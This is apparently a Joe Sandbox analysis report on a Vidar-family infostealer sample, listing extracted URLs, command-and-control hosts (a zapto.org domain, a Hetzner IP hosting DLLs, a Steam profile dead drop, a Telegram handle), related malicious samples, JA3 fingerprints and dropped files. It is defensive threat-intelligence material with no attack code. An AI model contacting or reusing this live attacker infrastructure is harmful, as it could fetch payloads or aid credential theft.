                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLAFIEGI.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://arpdabl.zapto.orgBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refBuyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/about/76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/my/wishlist/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://t.me/armad2ahellosqls.dllsqlite3.dllInBuyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://help.steampowered.com/en/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/market/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/news/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBKFCAF.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HDGCAA.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://store.steampowered.com/subscriber_agreement/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199747278259/inventory/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://arpdabl.zaptoBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/discussions/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/stats/Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/steam_refunds/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHDGCAA.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&aBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/workshop/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/legal/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContBuyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.sqlite.org/copyright.html.Buyer.pif, 0000000B.00000002.2541751260.000000000C8ED000.00000002.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541984442.000000000CCF8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://5.75.212.60/nss3.dll=Buyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoHDGCAA.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://arpdabl.DAKFIDGIDBBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://arpdabl.zapto.orgBBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaBuyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ac.ecosia.org/autocomplete?q=HDGCAA.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgBuyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBuyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          77.91.101.71
                          		arpdabl.zapto.orgRussian Federation
                          		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                          5.75.212.60
                          		unknownGermany
                          		24940HETZNER-ASDEfalse
                          23.192.247.89
                          		steamcommunity.comUnited States
                          		16625AKAMAI-ASUStrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1483190
                          Start date and time:2024-07-26 19:57:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:19
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@26/54@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 79
                          • Number of non-executed functions: 285
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          13:57:56API Interceptor1x Sleep call for process: file.exe modified
                          13:57:58API Interceptor1x Sleep call for process: Buyer.pif modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          77.91.101.71IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                          • arpdabl.zapto.org/
                          file.exeGet hashmaliciousVidarBrowse
                          • arpdabl.zapto.org/
                          Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                          • arpdabl.zapto.org/
                          Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                          • arpdabl.zapto.org/
                          subsoft.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                          • arpdabl.zapto.org/
                          hOYGfIcBVf.exeGet hashmaliciousLummaC, VidarBrowse
                          • arpdabl.zapto.org/
                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                          • arpdabl.zapto.org/
                          MN3OAv98T9.exeGet hashmaliciousLummaC, VidarBrowse
                          • arpdabl.zapto.org/
                          file.exeGet hashmaliciousVidarBrowse
                          • arpdabl.zapto.org/
                          file.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                          • arpdabl.zapto.org/
                          5.75.212.601lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                            file.exeGet hashmaliciousVidarBrowse
                              IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                file.exeGet hashmaliciousVidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                      23.192.247.89IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                        file.exeGet hashmaliciousVidarBrowse
                                          file.exeGet hashmaliciousVidarBrowse
                                            LisectAVT_2403002B_272.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              35fcdf3a.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                  CloudInstaller.zipGet hashmaliciousUnknownBrowse
                                                    SapphireX.exeGet hashmaliciousLummaC StealerBrowse
                                                      v993SRbY3C.exeGet hashmaliciousRedLineBrowse
                                                        ynZemxI36h.exeGet hashmaliciousRedLineBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          steamcommunity.com1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 23.199.218.33
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 23.197.127.21
                                                          IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                          • 23.192.247.89
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 23.192.247.89
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 23.192.247.89
                                                          LisectAVT_2403002B_272.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                          • 23.192.247.89
                                                          LisectAVT_2403002B_344.exeGet hashmaliciousBdaejec, VidarBrowse
                                                          • 23.207.106.113
                                                          LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                          • 23.199.218.33
                                                          LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                          • 23.199.218.33
                                                          LisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                                                          • 23.197.127.21
                                                          arpdabl.zapto.org1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 77.91.101.71
                                                          IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                          • 77.91.101.71
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 77.91.101.71
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 77.91.101.71
                                                          Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                          • 77.91.101.71
                                                          Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                          • 77.91.101.71
                                                          subsoft.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                          • 77.91.101.71
                                                          hOYGfIcBVf.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 77.91.101.71
                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                          • 77.91.101.71
                                                          MN3OAv98T9.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 77.91.101.71

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          AKAMAI-ASUS1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 23.199.218.33
                                                          file.exeGet hashmaliciousBabadeda, Coinhive, XmrigBrowse
                                                          • 23.223.209.207
                                                          FW_ Data Sync Completed Successfully - #BWYEIQF_.emlGet hashmaliciousUnknownBrowse
                                                          • 184.28.90.27
                                                          WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                                          • 23.45.221.2
                                                          http://dbqfv.albayadir.com/4FaPOJ14156pAYM1149rhihjecjok14462PXXTUVISVBPXZDA18893QSMJ16691Y17Get hashmaliciousUnknownBrowse
                                                          • 104.122.39.134
                                                          http://qugah.josebricenonunez.com/4bkLgq13767psOP1066qdrtnfgvkk14832GVFEQWKTBRGACUF22091YNZV16689a17Get hashmaliciousUnknownBrowse
                                                          • 104.122.39.134
                                                          One_Docx 1.pdfGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.118.8.172
                                                          Fire Safety Partnership.pdfGet hashmaliciousHTMLPhisherBrowse
                                                          • 2.16.202.123
                                                          IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                          • 23.192.247.89
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 23.192.247.89
                                                          HETZNER-ASDE1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 5.75.212.60
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 5.75.212.60
                                                          https://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                          • 88.99.142.215
                                                          IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                          • 5.75.212.60
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 5.75.212.60
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 5.75.212.60
                                                          A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                          • 188.40.141.211
                                                          C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                          • 159.69.71.228
                                                          be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                                          • 188.40.141.211
                                                          EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                                          • 188.40.141.211
                                                          FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUIRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                          • 77.91.101.71
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 77.91.101.71
                                                          Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                          • 77.91.101.71
                                                          Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                          • 77.91.101.71
                                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                          • 77.91.77.82
                                                          Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                          • 77.91.77.82
                                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                          • 77.91.77.82
                                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                          • 77.91.77.82
                                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                          • 77.91.77.82
                                                          file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                          • 77.91.77.82

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          51c64c77e60f3980eea90869b68c58a81lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 5.75.212.60
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 5.75.212.60
                                                          DS_Store.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                          • 5.75.212.60
                                                          IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                          • 5.75.212.60
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 5.75.212.60
                                                          yINa8PjdSm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                          • 5.75.212.60
                                                          DDPciclShm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                          • 5.75.212.60
                                                          uUW3k0UzfV.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                          • 5.75.212.60
                                                          yINa8PjdSm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                          • 5.75.212.60
                                                          DDPciclShm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                          • 5.75.212.60
                                                          37f463bf4616ecd445d4a1937da06e191lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 23.192.247.89
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 23.192.247.89
                                                          Monetary_Funding_Sheet_2024.jsGet hashmaliciousWSHRATBrowse
                                                          • 23.192.247.89
                                                          IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                          • 23.192.247.89
                                                          88z6JBPo00.exeGet hashmaliciousUnknownBrowse
                                                          • 23.192.247.89
                                                          fJDG7S5OD7.exeGet hashmaliciousUnknownBrowse
                                                          • 23.192.247.89
                                                          Ku8UpPuzaa.exeGet hashmaliciousUnknownBrowse
                                                          • 23.192.247.89
                                                          BvPEdRRQNz.exeGet hashmaliciousUnknownBrowse
                                                          • 23.192.247.89
                                                          uTQkPZ9odT.exeGet hashmaliciousUnknownBrowse
                                                          • 23.192.247.89
                                                          DOtQyvB2DJ.exeGet hashmaliciousTrojanRansomBrowse
                                                          • 23.192.247.89

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\ProgramData\freebl3.dll1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                            file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                              file.exeGet hashmaliciousVidarBrowse
                                                                6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                  IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                      file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                        JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                            file.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                                                              C:\ProgramData\mozglue.dll1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
